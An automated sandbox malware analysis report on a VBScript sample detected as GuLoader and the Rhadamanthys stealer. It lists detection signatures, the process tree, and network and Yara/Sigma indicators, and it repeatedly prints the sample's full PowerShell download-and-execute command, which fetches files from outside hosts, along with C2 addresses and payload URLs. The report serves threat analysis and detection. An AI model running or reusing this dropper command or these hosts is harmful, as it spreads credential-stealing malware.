Windows Analysis Report
YinLHGpoX4.vbs

Overview

General Information

Sample name: YinLHGpoX4.vbs
renamed because original name is a hash value
Original sample name: 4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c.vbs
Analysis ID: 1578231
MD5: 1c13faf06926c36c9b8abc23ab38e1eb
SHA1: 4085a7d8203165b83cd7283348a775d5db0ffbe1
SHA256: 4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c
Tags: 185-236-228-92, 87-120-112-91, vbs, www-al-rasikh-com, user-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7544 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7820 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WMIC.exe (PID: 7872 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line] MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 7744 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • powershell.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7256 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 8040 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • svchost.exe (PID: 7940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
Source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Author: Joe Security
Source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Author: Joe Security
Source: 0000000B.00000002.2214210925.0000000008970000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000014.00000003.2336659742.0000000004D20000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security

Source: 20.3.svchost.exe.4b00000.6.raw.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 20.3.svchost.exe.4d20000.7.raw.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 19.3.msiexec.exe.23000000.7.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 19.3.msiexec.exe.22de0000.6.raw.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 20.3.svchost.exe.4d20000.7.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security

Source: amsi64_7968.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: amsi32_5568.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Strings:
  • 0xa12a:$b2: ::FromBase64String(
  • 0x91c8:$s1: -join
  • 0x2974:$s4: +=
  • 0x2a36:$s4: +=
  • 0x6c5d:$s4: +=
  • 0x8d7a:$s4: +=
  • 0x9064:$s4: +=
  • 0x91aa:$s4: +=
  • 0x12e9d:$s4: +=
  • 0x12f1d:$s4: +=
  • 0x12fe3:$s4: +=
  • 0x13063:$s4: +=
  • 0x13239:$s4: +=
  • 0x132bd:$s4: +=
  • 0x99d0:$e4: Get-WmiObject
  • 0x9bbf:$e4: Get-Process
  • 0x9c17:$e4: Start-Process
  • 0x13b28:$e4: Get-Process

                        System Summary

                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , ProcessId: 7820, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , ProcessId: 7820, ProcessName: wscript.exe
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 
'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ProcessId: 7544, ProcessName: wscript.exe
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7592, TargetFilename: C:\Users\Public\k9o5xs1hnem9ja8a.vbs
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7592, TargetFilename: C:\Users\Public\k9o5xs1hnem9ja8a.vbs
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 
'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7256, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8040, ProcessName: svchost.exe
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun 
-url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ProcessId: 7544, ProcessName: wscript.exe
                        Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7940, ProcessName: svchost.exe
                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-12-19T12:51:39.349425+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49754 | 202.71.109.228 | 443 | TCP

                        AV Detection

                        Source: YinLHGpoX4.vbs, ReversingLabs: Detection: 13%
                        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                        Source: unknown, HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49754 version: TLS 1.2

                        Software Vulnerabilities

                        Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: winword.exe, Memory has grown: Private usage: 1MB later: 86MB

                        Networking

                        Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 45.149.241.141 2023
                        Source: global traffic, TCP traffic: 192.168.2.4:49830 -> 45.149.241.141:2023
                        Source: Joe Sandbox View, IP Address: 107.161.23.150
                        Source: Joe Sandbox View, IP Address: 103.53.42.63
                        Source: Joe Sandbox View, IP Address: 45.149.241.141
                        Source: Joe Sandbox View, IP Address: 202.71.109.228
                        Source: Joe Sandbox View, ASN Name: PUBLIC-DOMAIN-REGISTRYUS
                        Source: Joe Sandbox View, ASN Name: UUNETUS
                        Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49754 -> 202.71.109.228:443
                        Source: global traffic, HTTP traffic detected: GET /lm/lm.vbs HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: www.astenterprises.com.pk, Connection: Keep-Alive
                        Source: global traffic, HTTP traffic detected: GET /kp/Reissuer.xsn HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Host: www.tdejb.com, Connection: Keep-Alive
                        Source: global traffic, HTTP traffic detected: GET /lm/List%20of%20required%20items%20and%20services.doc HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682, Host: www.ftsengineers.com, Connection: Keep-Alive
                        Source: global traffic, HTTP traffic detected: GET /ab/ab.bin HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Host: www.tdejb.com, Cache-Control: no-cache
                        Source: unknown, TCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\SysWOW64\svchost.exe, Code function: 20_2_04D7B055 memset, memset, WSARecv, GetLastError, WSAGetLastError, WSAGetLastError, WSAGetLastError, RegisterWaitForSingleObject
                        Source: global traffic, DNS traffic detected: DNS query: www.astenterprises.com.pk
                        Source: global traffic, DNS traffic detected: DNS query: www.tdejb.com
                        Source: global traffic, DNS traffic detected: DNS query: www.ftsengineers.com
                        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknown, Network traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknown, Network traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443
                        Source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: DirectInput8Create memstr_df6c9e43-a
                        Source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: GetRawInputData memstr_f1f88172-e
                        Source: Yara match, File source: 20.3.svchost.exe.4b00000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 20.3.svchost.exe.4d20000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 19.3.msiexec.exe.23000000.7.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 19.3.msiexec.exe.22de0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 20.3.svchost.exe.4d20000.7.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 19.3.msiexec.exe.23000000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000014.00000003.2336659742.0000000004D20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000014.00000003.2336254784.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR

                        System Summary

                        Source: amsi32_5568.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7968, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
